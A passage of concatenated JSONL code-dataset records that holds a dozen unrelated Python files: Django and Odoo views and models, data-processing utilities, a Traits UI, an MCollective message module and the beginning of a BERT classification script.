loader.get_template('Dashboard/assessmentcoveragebyclass')\n c = Context({'assessmentcoveragedict': assessmentcoveragedict,})\n return HttpResponse(t.render(c),content_type=\"text/xml\")\n\ndef get_subject_of_class(request):\n session = get_current_session()\n teacherkey = session.get('teacherkey',-1)\n key = request.GET['id']\n classkey = ndb.Key(urlsafe=key)\n logging.error(classkey)\n subjectdict = Query.get_subject_details_of_teacher_in_class(teacherkey,classkey)\n t = loader.get_template('Dashboard/getsubjectofclass')\n c = Context({'getsubjectofclass': subjectdict,})\n return HttpResponse(t.render(c),content_type=\"text/xml\")\n\ndef get_readytolearn_of_subject(request):\n session = get_current_session()\n teacherkey = session.get('teacherkey',-1)\n key = request.GET['classid']\n classkey = ndb.Key(urlsafe=key)\n key = request.GET['subjectid']\n subjectkey = ndb.Key(urlsafe=key)\n logging.error(\"99999999999999999999999999999999\")\n readytolearn = Query.get_ready_to_learn_of_class(teacherkey,classkey,subjectkey)\n t = loader.get_template('Dashboard/readytolearn_ofsubjectofclass')\n c = Context({'readytolearndict': readytolearn,})\n return HttpResponse(t.render(c),content_type=\"text/xml\")\n\ndef get_assessment_coverage_of_subject(request):\n session = get_current_session()\n teacherkey = session.get('teacherkey',-1)\n key = request.GET['classid']\n classkey = ndb.Key(urlsafe=key)\n key = request.GET['subjectid']\n subjectkey = ndb.Key(urlsafe=key)\n assessmentcoveragedict = Query.get_assessment_coverage_of_subject(teacherkey,classkey,subjectkey)\n logging.error(\"101010\"+str(assessmentcoveragedict))\n t = loader.get_template('Dashboard/assessmentcoverageofsubject')\n c = Context({'assessmentcoveragedict': assessmentcoveragedict,})\n return HttpResponse(t.render(c),content_type=\"text/xml\")\n\n\ndef get_averagemastery_of_subject_topicwise(request):\n session = get_current_session()\n teacherkey = session.get('teacherkey',-1)\n key = request.GET['classid']\n classkey = ndb.Key(urlsafe=key)\n key = request.GET['subjectid']\n subjectkey = ndb.Key(urlsafe=key)\n averagemasteryofsubject = Query.get_average_mastery_of_a_subject(teacherkey,classkey,subjectkey)\n logging.error(averagemasteryofsubject)\n t = loader.get_template('Dashboard/averagemasteryofsubjecttopicwise')\n c = Context({'averagemasterydict': averagemasteryofsubject,})\n return HttpResponse(t.render(c),content_type=\"text/xml\")\n\n","sub_path":"AssessingPie/teacher_dashboard_data.py","file_name":"teacher_dashboard_data.py","file_ext":"py","file_size_in_byte":6305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"295171598","text":"import re\nimport sklearn as skl\nimport sklearn.preprocessing\n\ndef vectorize(data, label_column, features=[('time', 0), ('day', 0), ('month', 0), ('year', 0), ('day_of_week', 0), ('latitude', 7), ('longitude', 8)]):\n\t'''Generator function that extracts and returns a selectible set of features for each data point in the data parameter.\n\t\n\tReturns a vector containing values for the selected features. The order in the features parameter is indicative of the order in\n\tthe resulting vector (except when using the 'streets' feature, see below).\n\t\n\tdata\n\tdata is a sequence of subscriptables. Each subscriptable usually represents a line read from a .csv file.\n\t\n\tlabel_column\n\tlabel_column is None if the data is unlabeled. Otherwise, it is the index under which the label is found in each subscriptable.\n\tThe label is assumed to be a string and will be mapped to an integer unique to each unique string. This integer is appended as the\n\tlast element in the output vector.\n\tThere is one more thing about this parameter. If it is not none, the first element yielded by this generator function is a dictionary\n\tthat maps crime type strings to unambiguous ids. It is empty until more elements are extracted from this generator.\n\t\n\tfeatures\n\tfeatures is an iterable of 2-tuples (feature, index). It indicates\n\t- which features to extract (first part of each tuple)\n\t- under which index information needed for that feature is found (second part of each tuple)\n\t- in which order to place the features in the resulting feature vector (given by the order in the iterable)\n\t\n\tAvailable features are: 'time', 'day', 'month', 'year', 'day_of_week', 'latitude', 'longitude', 'streets'.\n\tThe features 'time', 'day', 'month', 'year' and 'day_of_week' are extracted from a time.struct_time object, so their associated\n\tindex in the (feature, index) tuple is usually identical. 'latitude' and 'longitude' are expected to be floats and are used 'as is'.\n\t\n\tThe 'streets' feature is a bit special in that it doesn't produce a single value in the output vector, but three. There are two types\n\tof street designation formats in the data set:\n\t- STREET_1 / STREET_2\n\t- Xth block of STREET\n\tIn the former case, two unique ids for the streets are appended to the output vector, followed by a -1. In the latter case, the street\n\tid and then the block number is appended to the vector, followed by a +1.\n\t'''\n\t\n\tstreet_type_1 = re.compile(r'(.+) / (.+)') # Regular expression to recognize street designations of the form 'STREET_1 / STREET_2'\n\tstreet_type_2 = re.compile(r'(.+) Block of (.+)') # as above, for ' Xth block of STREET'\n\tcrime_type_ids = {} # Dictionary unambiguously mapping crime type strings to integer ids\n\tcrime_type_counter = 0 # Counts how many different types of crime have been found.\n\tstreet_ids = {} # Dictionary unambiguously mapping street name strings to integer ids\n\tstreet_counter = 0 # Counts how many unique street names have been found.\n\t\n\t# Provide caller with the dictionary if appropriate.\n\tif label_column is not None:\n\t\tyield crime_type_ids\n\n\tfor data_point in data:\n\t\t# Get crime id from dictionary, or make new one if neccessary.\n\t\tif label_column is not None:\n\t\t\ttry:\n\t\t\t\tcrime_type_id = crime_type_ids[data_point[label_column]]\n\t\t\texcept KeyError:\n\t\t\t\tcrime_type_ids[data_point[label_column]] = crime_type_counter\n\t\t\t\tcrime_type_counter += 1\n\t\t\t\tcrime_type_id = crime_type_ids[data_point[label_column]]\n\t\t\n\t\t# Create vector and append all requested features\n\t\tvec = []\n\t\tfor feature, column in features:\n\t\t\tif feature == 'time':\n\t\t\t\ttime = data_point[column].tm_hour * 60 + data_point[column].tm_min # Time in minutes since 00:00\n\t\t\t\tvec.append(time)\n\t\t\telif feature == 'day':\n\t\t\t\tday = data_point[column].tm_mday\n\t\t\t\tvec.append(day)\n\t\t\telif feature == 'month':\n\t\t\t\tmonth = data_point[column].tm_mon\n\t\t\t\tvec.append(month)\n\t\t\telif feature == 'year':\n\t\t\t\tyear = data_point[column].tm_year\n\t\t\t\tvec.append(year)\n\t\t\telif feature == 'day_of_week':\n\t\t\t\tvec.append(data_point[column].tm_wday)\n\t\t\telif feature == 'latitude':\n\t\t\t\tvec.append(data_point[column])\n\t\t\telif feature == 'longitude':\n\t\t\t\tvec.append(data_point[column])\n\t\t\telif feature == 'streets':\n\t\t\t\ttype1_match = street_type_1.match(data_point[column])\n\t\t\t\tif type1_match is not None: # Street designation is of the form 'STREET_1 / STREET_2'\n\t\t\t\t\tstreet1, street2 = type1_match.group(1, 2) # fetch components\n\t\t\t\t\tif street1 not in street_ids: # Get / create street id\n\t\t\t\t\t\tstreet_ids[street1] = street_counter\n\t\t\t\t\t\tstreet_counter += 1\n\t\t\t\t\tif street2 not in street_ids: # Get / create street id\n\t\t\t\t\t\tstreet_ids[street2] = street_counter\n\t\t\t\t\t\tstreet_counter += 1\n\t\t\t\t\ts1_id = street_ids[street1]\n\t\t\t\t\ts2_id = street_ids[street2]\n\t\t\t\t\tvec.append(s1_id)\n\t\t\t\t\tvec.append(s2_id)\n\t\t\t\t\tvec.append(-1)\n\t\t\t\telse: # Street designation is of the form 'Xth block of STREET'\n\t\t\t\t\ttype2_match = street_type_2.match(data_point[column])\n\t\t\t\t\tif type2_match is not None:\n\t\t\t\t\t\tblock, street = type2_match.group(1, 2) # fetch components\n\t\t\t\t\t\tblock = int(block)\n\t\t\t\t\t\tif street not in street_ids: # Get / create street id\n\t\t\t\t\t\t\tstreet_ids[street] = street_counter\n\t\t\t\t\t\t\tstreet_counter += 1\n\t\t\t\t\t\ts_id = street_ids[street]\n\t\t\t\t\t\tvec.append(s_id)\n\t\t\t\t\t\tvec.append(block)\n\t\t\t\t\t\tvec.append(1)\n\t\t\t\t\telse: # Street designation is in neither format\n\t\t\t\t\t\traise 'Unknown street format: {0}'.format(data_point[6])\n\t\t\telse: # Caller has requested an unknown feature\n\t\t\t\traise 'Feature not supported!'\n\t\t\n\t\t# If data is labeld, append vectorized data as last element\n\t\tif label_column is not None:\n\t\t\tvec.append(crime_type_id)\n\t\t\n\t\tyield vec\n\ndef remove_outliers(data, lat_index, long_index):\n\t'''Generator function that yields every item in the sequence data, if it is within the specified coordinates.'''\n\t# define outermost coordinates\n\tSOUTH = {'y': 37.696850, 'x': -122.440464}\n\tEAST = {'y': 37.764893, 'x': -122.347306} \n\tNORTH = {'y': 37.839763, 'x': -122.424554}\n\tWEST = {'y': 37.728356, 'x': -122.535908}\n\t\n\tfor data_point in data:\n\t\tif data_point[lat_index] < WEST['x'] \\\n\t\tor data_point[lat_index] > EAST['x'] \\\n\t\tor data_point[long_index] < SOUTH['y'] \\\n\t\tor data_point[long_index] > NORTH['y']:\n\t\t\tcontinue # data point is out of bounds, skip it\n\t\t\n\t\tyield data_point\n\ndef ensure_unit_variance(data, columns_to_normalize):\n\t'''Returns a version of data where all indicated columns are made to be mean-free and have unit variance.\n\t\n\tdata is a numpy array of shape (#samples, #features)\n\tcolumns_to_normalize is an iterable of column indices\n\t'''\n\tscaled_data = skl.preprocessing.scale(data)\n\t\n\tnew_data = data.copy()\n\tfor column in columns_to_normalize:\n\t\tnew_data[:,column] = scaled_data[:,column]\n\treturn new_data\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"project/src/data_processing.py","file_name":"data_processing.py","file_ext":"py","file_size_in_byte":6686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"184950784","text":"\"\"\"\nSnippets of useful code\n\nCreated: 10/14/2017\nUpdates: 10/14/2017\nAuthor: Frank J Genova\n\n\"\"\"\n\nimport sys\n\nclass VersionSnips(object):\n \"\"\"\n methods used to handle version checking,\n useful in working with environments and debugging modes\n \"\"\"\n\n def test_python_version(self, major=3, minor=6, micro=2):\n \"\"\"\n checks current Python version,\n will only display vesion if other than defaults\n \"\"\"\n\n v = sys.version_info\n if v.major != major or v.minor != minor or v.micro != micro:\n major = v.major\n minor = v.minor\n micro = v.micro\n print('='*40)\n print('WARNING: Using Python {}.{}.{}'.format(major, minor, micro))\n print('='*40)\n else:\n return True\n\nif __name__ == '__main__':\n running_version = VersionSnips()\n running_version.test_python_version(3,6,2)\n \n ","sub_path":"Py_Other/snippy.py","file_name":"snippy.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"50344501","text":"'''\n@author: Jake Ross\n@copyright: 2009\n@license: Educational Community License 1.0\n'''\n#=============enthought library imports=======================\nfrom enthought.traits.api import HasTraits, Event, Any, Str, Float, Bool, List, Enum\nfrom enthought.traits.ui.api import View, Item, HGroup, VGroup, TableEditor, ButtonEditor, EnumEditor\nfrom enthought.traits.ui.table_column import ObjectColumn\nfrom enthought.traits.ui.extras.checkbox_column import CheckboxColumn\n#=============standard library imports ========================\n\n#=============local library imports ==========================\nclass Streams(HasTraits):\n '''\n G{classtree}\n '''\n parent = Any\n name = Str\n include = Bool(False)\n delay = Float(1.0)\n _type = Enum('scatter', 'line')\n\n #options=Enum('a','b','c')\n\n\nclass StreamLoader(HasTraits):\n '''\n G{classtree}\n '''\n streams = List\n save_data = Bool(True)\n default_path = Bool(True)\n '''\n '''\n save_type = Enum('txt', 'h5')\n\n show_hide = Event\n label = Str('Include All')\n state = Bool\n\n time_units = 1\n def _show_hide_fired(self):\n '''\n '''\n self.state = not self.state\n\n for c in self.streams:\n c.include = self.state\n\n self.label = 'Exclude All' if self.state else 'Include All'\n\n def add_stream(self, parent):\n '''\n @_type parent: C{str}\n @param parent:\n '''\n s = Streams(parent = parent, name = parent.name)\n self.streams.append(s)\n\n def traits_view(self):\n '''\n '''\n cols = [\n ObjectColumn(name = 'name'),\n CheckboxColumn(name = 'include'),\n ObjectColumn(name = 'delay'),\n ObjectColumn(name = '_type')\n ]\n table_editor = TableEditor(columns = cols)\n v = View(VGroup(\n HGroup(\n Item('save_data'),\n Item('default_path', visible_when = 'save_data'),\n Item('save_type', visible_when = 'save_data', show_label = False)\n ),\n HGroup(Item('time_units', editor = EnumEditor(values = {1:'seconds', 60:'minutes', 3600:'hours'})), springy = False),\n Item('streams', show_label = False, editor = table_editor, height = 75),\n HGroup(\n Item('show_hide', editor = ButtonEditor(label_value = 'label'),\n show_label = False,\n springy = False\n )\n )\n ),\n height = 500,\n width = 100,\n resizable = True,\n #title = 'Select Streams',\n buttons = ['OK', 'Cancel'])\n return v\n","sub_path":"src/managers/stream_loader.py","file_name":"stream_loader.py","file_ext":"py","file_size_in_byte":2799,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"32793721","text":"\n\"\"\"f we list all the natural numbers below 10 that are multiples of 3 or 5, we get 3, 5, 6 and 9. The sum of these multiples is 23.\n\nFind the sum of all the multiples of 3 or 5 below 1000.\"\"\"\n\ndef multiplu(i):\n \n #main condition\n \n if (i%3==0)or(i%5==0):\n \n return True\n \n \n\ndef main():\n s=0;\n \n #counting\n \n for i in range(1000): \n if multiplu(i): s+=i;\n \n print(s)\n \nif __name__==\"__main__\":\n main();\n \n","sub_path":"1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"548687209","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import models, fields, api\n\nclass shop_type(models.Model):\n\t_name = 'shop.type'\n\tname = fields.Char(string=\"Name\")\n\n\n\nclass city_city(models.Model):\n\t_name = 'city.city'\n\tname = fields.Char(string=\"Name\")\n\n\nclass res_branch(models.Model):\n\t_inherit='res.branch'\n\n\tcountry_code = fields.Char(string=\"Counter code\", size=12)\n\treg_key = fields.Char(string=\"Registration Key\")\n\tcustomer_care = fields.Many2one('hr.employee', string=\"Customer Care\")\n\tcity = fields.Many2one('city.city',string=\"City\")\n\tshoptype_id = fields.Many2one('shop.type', string=\"Shop Type\")\n\tsize_counter = fields.Char(string=\"Size Counter\")\n\tcategory_mall = fields.Selection(\n\t\tselection=[('a', 'A'),\n\t\t\t\t\t('b', 'B'),('c', 'C')],\n\t\tstring='Category Mall',\n\t\tdefault='a',\n\t)\n\tlocation = fields.Char(string=\"Location\")\n\temail = fields.Char(string=\"Email\")\n\tpic_id = fields.Many2one('hr.employee',string=\"PIC\")\n\tdescription = fields.Char(string=\"Description\")\n\topen_date = fields.Date(string=\"Open Date\")\n\tclose_date = fields.Date(string=\"Close Date\")\n\tactive = fields.Boolean(default=True)\n\tis_warehouse = fields.Boolean('Is A Warehouse', default=True)\n\n\nclass Saleorder(models.Model):\n\t_inherit = 'sale.order'\n\n\tbranch_id = fields.Many2one('res.branch', 'Branch', required=False)\n\n\nclass PurchaseOrder(models.Model):\n\t_inherit = 'purchase.order'\n\n\tbranch_id = fields.Many2one('res.branch', 'Branch', required=False)","sub_path":"beta-dev1/pdp_modifier_branch/models/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"580071156","text":"# -*- coding: utf-8 -*-\n\nfrom django.shortcuts import render, redirect\n\n\n\n# Importamos una clase\nfrom django.http import HttpResponse\n\nfrom django.core.urlresolvers import reverse_lazy\n\nfrom django.views.generic import ListView, CreateView, UpdateView, DeleteView\n\n# Importamos el formulario que creamos\nfrom app.mascota.form import MascotaForm \n\n# Importamos el modelo\nfrom app.mascota.models import Mascota\n\n# Create your views here.\ndef index(request):\n\treturn render(request, 'mascota/index.html')\n\n\n# Creamos una vista (esta es basada en función)\ndef mascota_view(request):\n\t# Si el request es un POST\n\tif request.method == 'POST':\n\t\t# se va a recibir los datos que estan mandando en el post de nuestro formulario\n\t\tform = MascotaForm(request.POST)\n\t\t# consultados si los datos mandados son válidos se guardan esos datos\n\t\tif form.is_valid():\n\t\t\tform.save()\n\t\t# si pasa vamos a redirigir con el shortcut redirect (hay que importarlos) a una url usamos el espacio de nombre que ya habíamos definido\n\t\treturn redirect('mascota:index')\n\telse:\n\t\t# si no es post no volvemos al formulario\n\t\tform = MascotaForm()\n\t# Por último mandamos la respuesta que es un request (sin olvidar de pasar el contexto en un diccionario)\n\treturn render (request, 'mascota/mascota_form.html', {'form':form})\n\n#----------------------------------------------------------------------------------------\n#----------------------------------------------------------------------------------------\n\t\t\t\t\t# VISTAS BASADAS EN CLASE (importante importar las views.generic)\n#----------------------------------------------------------------------------------------\n#----------------------------------------------------------------------------------------\n\n# Vista para Listar Registros\n\nclass MascotaList(ListView):\n\t# indicamos cual es el modelo\n\tmodel = Mascota \n\t# indicamos a que template enviamos el contexto\n\ttemplate_name = 'mascota/mascota_list.html'\n\n# Vista para Crear Registros\n\nclass MascotaCreate(CreateView):\n\tmodel = Mascota\n\tform_class = MascotaForm\n\ttemplate_name = 'mascota/mascota_form.html'\n\tsuccess_url = reverse_lazy('mascota:mascota_listar')\n\t\n# Vista para actualizar\nclass MascotaUpdate(UpdateView):\n\tmodel = Mascota\n\tform_class = MascotaForm\n\ttemplate_name = 'mascota/mascota_form.html'\n\tsuccess_url = reverse_lazy('mascota:mascota_listar')\n\n# Vista para eliminar\nclass MascotaDelete(DeleteView):\n\tmodel = Mascota\n\ttemplate_name = 'mascota/mascota_delete.html'\n\tsuccess_url = reverse_lazy('mascota:mascota_listar')\n\n\n\n","sub_path":"refugio/app/mascota/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"177607566","text":"import pandas as pd , math,numpy as np, csv, sqlite3 , time\ntic = time.perf_counter() #starting the timer\n\n#loading datasets from csv files\ndataset_A = pd.read_csv(\"../dataset_A.csv\",index_col=False,names=[\"id\",\"name\",\"website\",\"phone\",\"code\",\"postal_code\",\"address\",\"country\"])\ndataset_B = pd.read_csv(\"../dataset_B.csv\",index_col=False,names=[\"id\",\"name\",\"website\",\"phone\",\"code\",\"postal_code\",\"address\",\"country\"])\n\n#converting website & name columns to str and making sure they are in lowercase\ndataset_A.website=dataset_A.website.astype(str).apply(lambda f: f.lower())\ndataset_A.name=dataset_A.name.apply(lambda f: f.lower()).astype(str)\ndataset_B.website=dataset_B.website.astype(str).apply(lambda f: f.lower())\ndataset_B.name=dataset_B.name.astype(str).apply(lambda f: f.lower())\n\n#looping through the first dataset_A\nfor index,row in dataset_A.iterrows():\n #testing if the current row from dataset_A appears in dataset_B\n if((row['name']!=\"nan\" and row['name']!=\"\") or (row['website']!=\"nan\" and row['website']!=\"\")) :\n matches = dataset_B.loc[ (row[\"name\"] == dataset_B[\"name\"])\n & (row[\"website\"] == dataset_B[\"website\"] )\n ]\n if matches.size > 0:\n #writing the result to a csv file\n with open('result.csv','a',newline='') as csvfile:\n fieldnames = ['source_A','source_B']\n writer = csv.DictWriter(csvfile, fieldnames=fieldnames)\n for ind,join in matches.iterrows():\n print(row[\"name\"]+\" matches with \"+join[\"name\"])\n writer.writerow({\"source_A\":row[\"id\"] , \"source_B\" : join[\"id\"]}) \ntoc = time.perf_counter()\nprint(f\"computed matches in {toc - tic:0.4f} seconds\")\n\n","sub_path":"matching/matching/match_to_csv.py","file_name":"match_to_csv.py","file_ext":"py","file_size_in_byte":1783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"183035658","text":"import bootcamp_utils\r\n\r\ndef numbers_negatives(seq):\r\n \"\"\"Number of negative residues in a protein sequence\"\"\"\r\n seq = seq.upper()\r\n \r\n for am_ac in seq:\r\n if am_ac not in bootcamp_utils.aa:\r\n raise RuntimeError(f'{am_ac} is not a valid amino acid')\r\n \r\n return seq.count('D') + seq.count('E')","sub_path":"day2_Antoine/seq_features.py","file_name":"seq_features.py","file_ext":"py","file_size_in_byte":329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"126356014","text":"import pandas as pd\nfrom sklearn.metrics.pairwise import cosine_similarity\nfrom sklearn.feature_extraction.text import CountVectorizer\n\ndef acci_type(acci,data):\n top=31\n my_acci=acci\n\n data.loc[len(data)] = [my_acci,'None']\n\n count_vector = CountVectorizer(ngram_range=(1,3))\n c_vector_title = count_vector.fit_transform(data['input'])\n\n title_c_sim = cosine_similarity(c_vector_title, c_vector_title).argsort()[:,::-1]\n\n target_type_index = data[data['input'] == my_acci].index.values\n\n sim_index = title_c_sim[target_type_index, :top].reshape(-1)\n sim_index = sim_index[sim_index != target_type_index]\n result = data.iloc[sim_index]\n best_type = result['output'].value_counts().head(3)\n \n top_3={}\n l=1\n for i in best_type.index:\n top_3[l]=i\n l+=1\n \n return top_3\n","sub_path":"acci_type/type.py","file_name":"type.py","file_ext":"py","file_size_in_byte":916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"191512650","text":"'''pymco messaging objects'''\nimport collections\nimport hashlib\nimport time\n\nimport six\n\nfrom . import exc\n\n\nclass Filter(collections.Mapping):\n '''Provides MCollective filters for pymco. This class implements\n :py:class:`collections.Mapping` interface, so it can be used as non mutable\n mapping (read only dict), but mutable using provided add methods. So that,\n for adding the agent you can just use :py:meth:`add_agent`::\n\n filter.add_agent('package')\n '''\n def __init__(self):\n self._filter = {\n 'cf_class': [],\n 'agent': [],\n 'fact': [],\n 'identity': [],\n 'compound': [],\n }\n\n def add_cfclass(self, klass):\n '''Adds new classes/recipes/cookbooks/roles applied by your\n configuration management system.'''\n self._filter['cf_class'].append(klass)\n return self\n\n def add_agent(self, agent):\n '''Adds new agents'''\n self._filter['agent'].append(agent)\n return self\n\n def add_fact(self, fact, value, operator=None):\n '''Adds new facts'''\n toappend = {':fact': fact, ':value': value}\n if operator:\n if not operator in ('==', '=~', '<=', '=>', '>=', '=<', '>', '<',\n '!='):\n raise exc.BadFilterFactOperator(\n 'Unsuppoerted operator {0}'.format(operator))\n toappend[':operator'] = operator\n self._filter['fact'].append(toappend)\n return self\n\n def add_identity(self, identity):\n '''Adds new identities'''\n self._filter['identity'].append(identity)\n return self\n\n def __getitem__(self, key):\n return self._filter[key]\n\n def __len__(self):\n return len(self._filter)\n\n def __iter__(self):\n return six.iterkeys(self._filter)\n\n\nclass Message(collections.MutableMapping):\n '''Provides MCollective messages for pymco. This class implements\n :py:class:`collections.MutableMapping` interface, so it can be used as\n read/write mapping (dictionary).'''\n def __init__(self, body, agent, config, filter_=None, **kwargs):\n if not filter_:\n filter_ = Filter()\n\n self._message = {}\n try:\n self._message[':senderid'] = config['identity']\n self._message[':collective'] = (kwargs.get('collective', None) or\n config['main_collective'])\n except KeyError as error:\n raise exc.ImproperlyConfigured(error)\n self._message[':msgtime'] = int(time.time())\n self._message[':ttl'] = (kwargs.get('ttl', None) or\n config.getint('ttl', default=60))\n self._message[':requestid'] = hashlib.sha1(\n str(self._message[':msgtime']).encode('utf-8')).hexdigest()\n self._message[':body'] = body\n self._message[':agent'] = agent\n self._message[':filter'] = dict(filter_)\n\n def __len__(self):\n return len(self._message)\n\n def __iter__(self):\n return six.iterkeys(self._message)\n\n def __getitem__(self, key):\n return self._message[key]\n\n def __setitem__(self, key, value):\n if not key.startswith(':'):\n raise ValueError('Keys must start with `:`, as Ruby symbols.')\n\n if key == ':filter':\n value = dict(value)\n self._message[key] = value\n\n def __delitem__(self, key):\n del self._message[key]\n","sub_path":"pymco/message.py","file_name":"message.py","file_ext":"py","file_size_in_byte":3470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"492905149","text":"'''update an ENVI header file:\n - band names portion\n - image dimensions or number of bands\n(updated 20220324)'''\nimport os\nimport sys\nfrom misc import *\nargs = sys.argv\nsep = os.path.sep\nexists = os.path.exists\npd = sep.join(__file__.split(sep)[:-1]) + sep\n\nif len(args) < 6:\n err('envi_header_modify.py [.hdr file to modify] [nrow] [ncol] [nband] [band 1 name]... [band n name]')\n\nnrow, ncol, nband = args[2], args[3], args[4]\nif not exists(args[1]): \n err('please check input files:\\n\\t' + args[1] + '\\n\\t' + args[2])\n\n# need to run this first to make sure the band name fields are where we expect!\nif len(args) < int(nband) + 5:\n run('python3 ' + pd + 'envi_header_cleanup.py ' + args[1])\nlines = open(args[1]).read().strip().split('\\n')\n\ndef get_band_names_lines(hdr):\n idx = get_band_names_line_idx(hdr)\n lines = open(hdr).readlines()\n return [lines[i] for i in idx], idx\n[bn1, ix1] = get_band_names_lines(args[1])\n\nlines_new = []\nfor i in range(0, len(lines)):\n line = lines[i] # for every line in the output file...\n \n w = [x.strip() for x in line.split('=')]\n if len(w) > 1:\n if w[0] == 'samples': line = 'samples = ' + ncol\n if w[0] == 'lines': line = 'lines = ' + nrow\n if w[0] == 'bands': line = 'bands = ' + nband\n\n if i not in ix1: # if it's a band-names line!\n lines_new.append(line)\n\n# write new header file\nbn_new = args[5: 5 + int(nband)]\nif len(bn_new) != int(nband):\n err('inconsistent input')\n\nlines_new += ['band names = {' + bn_new[0]]\nprint([bn_new[0]])\nfor i in range(1, len(bn_new)):\n lines_new[-1] += ','\n print([bn_new[i]])\n lines_new += [bn_new[i]]\nlines_new[-1] += '}'\nprint('+w', args[1])\nopen(args[1], 'wb').write('\\n'.join(lines_new).encode())\n","sub_path":"py/envi_header_modify.py","file_name":"envi_header_modify.py","file_ext":"py","file_size_in_byte":1758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"476421959","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport collections\nimport csv\nimport json\nimport os\nimport time\n\nimport numpy as np\nimport tensorflow as tf\n\nfrom bert import modeling\nfrom bert import optimization\nfrom bert import tokenization\n\nMIN_FLOAT = -1e30\n\nflags = tf.flags\nFLAGS = flags.FLAGS\n\nflags.DEFINE_string(\"bert_config_file\", None, \"The config json file corresponding to the pre-trained BERT model.\")\nflags.DEFINE_string(\"vocab_file\", None, \"The vocabulary file that the BERT model was trained on.\")\nflags.DEFINE_string(\"data_dir\", None, \"The input data dir. Should contain the .json files for the task.\")\nflags.DEFINE_string(\"task_name\", None, \"The name of the task to train.\")\nflags.DEFINE_string(\"output_dir\", None, \"The output directory where the model checkpoints will be written.\")\nflags.DEFINE_string(\"export_dir\", None, \"The export directory where the saved model will be written.\")\n\nflags.DEFINE_string(\"init_checkpoint\", None, \"Initial checkpoint (usually from a pre-trained BERT model).\")\nflags.DEFINE_bool(\"do_lower_case\", True, \"Whether to lower case the input text. True for uncased models and False for cased models.\")\n\nflags.DEFINE_integer(\"random_seed\", 100, \"Random seed for weight initialzation.\")\nflags.DEFINE_string(\"predict_tag\", None, \"Predict tag for predict result tracking.\")\n\nflags.DEFINE_integer(\n \"max_seq_length\", 128,\n \"The maximum total input sequence length after WordPiece tokenization. \"\n \"Sequences longer than this will be truncated, and sequences shorter than this will be padded.\")\n\nflags.DEFINE_bool(\"do_train\", False, \"Whether to run training.\")\nflags.DEFINE_bool(\"do_eval\", False, \"Whether to run evaluation.\")\nflags.DEFINE_bool(\"do_predict\", False, \"Whether to run prediction.\")\nflags.DEFINE_bool(\"do_export\", False, \"Whether to run exporting.\")\n\nflags.DEFINE_integer(\"train_batch_size\", 32, \"Total batch size for training.\")\nflags.DEFINE_integer(\"eval_batch_size\", 8, \"Total batch size for eval.\")\nflags.DEFINE_integer(\"predict_batch_size\", 8, \"Total batch size for predict.\")\n\nflags.DEFINE_float(\"learning_rate\", 5e-5, \"The initial learning rate for Adam.\")\nflags.DEFINE_float(\"num_train_epochs\", 3.0, \"Total number of training epochs to perform.\")\nflags.DEFINE_float(\"warmup_proportion\", 0.1, \"Proportion of training to perform linear learning rate warmup for.\")\n\nflags.DEFINE_integer(\"save_checkpoints_steps\", 1000, \"How often to save the model checkpoint.\")\nflags.DEFINE_integer(\"iterations_per_loop\", 1000, \"How many steps to make in each estimator call.\")\n\nflags.DEFINE_bool(\"use_tpu\", False, \"Whether to use TPU or GPU/CPU.\")\nflags.DEFINE_integer(\"num_tpu_cores\", 8,\"Only used if `use_tpu` is True. Total number of TPU cores to use.\")\nflags.DEFINE_string(\"master\", None, \"[Optional] TensorFlow master URL.\")\n\nflags.DEFINE_string(\n \"tpu_name\", None,\n \"The Cloud TPU to use for training. This should be either the name \"\n \"used when creating the Cloud TPU, or a grpc://ip.address.of.tpu:8470 url.\")\n\nflags.DEFINE_string(\n \"tpu_zone\", None,\n \"[Optional] GCE zone where the Cloud TPU is located in. If not \"\n \"specified, we will attempt to automatically detect the GCE project from metadata.\")\n\nflags.DEFINE_string(\n \"gcp_project\", None,\n \"[Optional] Project name for the Cloud TPU-enabled project. If not \"\n \"specified, we will attempt to automatically detect the GCE project from metadata.\")\n\nclass InputExample(object):\n \"\"\"A single training/test example for simple sequence classification.\"\"\"\n def __init__(self,\n guid,\n text,\n sent_label=None):\n \"\"\"Constructs a InputExample.\n\n Args:\n guid: Unique id for the example.\n text: string. The untokenized text of the first sequence. For single\n sequence tasks, only this sequence must be specified.\n sent_label: (Optional) string. The sentence label of the example. This should be\n specified for train and dev examples, but not for test examples.\n \"\"\"\n self.guid = guid\n self.text = text\n self.sent_label = sent_label\n\nclass PaddingInputExample(object):\n \"\"\"Fake example so the num input examples is a multiple of the batch size.\n \n When running eval/predict on the TPU, we need to pad the number of examples\n to be a multiple of the batch size, because the TPU requires a fixed batch\n size. The alternative is to drop the last batch, which is bad because it means\n the entire output data won't be generated.\n \n We use this class instead of `None` because treating `None` as padding\n battches could cause silent errors.\n \"\"\"\n\nclass InputFeatures(object):\n \"\"\"A single set of features of data.\"\"\"\n def __init__(self,\n input_ids,\n input_masks,\n segment_ids,\n sent_label_id):\n self.input_ids = input_ids\n self.input_masks = input_masks\n self.segment_ids = segment_ids\n self.sent_label_id = sent_label_id\n\nclass ClassificationProcessor(object):\n 